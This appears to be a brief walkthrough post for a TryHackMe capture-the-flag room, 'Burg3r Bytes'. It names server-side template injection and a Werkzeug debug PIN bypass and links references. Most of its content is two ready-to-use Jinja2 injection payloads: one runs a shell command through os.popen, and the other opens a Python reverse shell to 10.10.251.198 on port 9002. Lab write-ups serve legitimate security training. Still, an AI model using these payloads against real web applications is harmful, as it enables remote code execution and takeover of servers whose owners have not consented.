🍔🍔🍔🔔 TryHack3M: Burg3r Bytes TryHackMe walkthrough 🍔🍔🔔🔔

🍔 They say these burgers are worth every penny. Can you buy one?

Room link: https://tryhackme.com/r/room/burg3rbytes

🍔🍔 SSTI (Server Side Template Injection)

https://book.hacktricks.xyz/pentestin...

🍔🍔 Werkzeug Debug Console Pin Bypass

https://github.com/wdahlenburg/werkze...

🍔🍔 RCE:

{{ cycler.__init__.__globals__.os.popen('id').read() }}

🍔🍔 reverse shell:

{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.251.198\",9002));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\", \"-i\"]);'")}}{%endif%}{% endfor %}

🍔🍔

#tryhackme
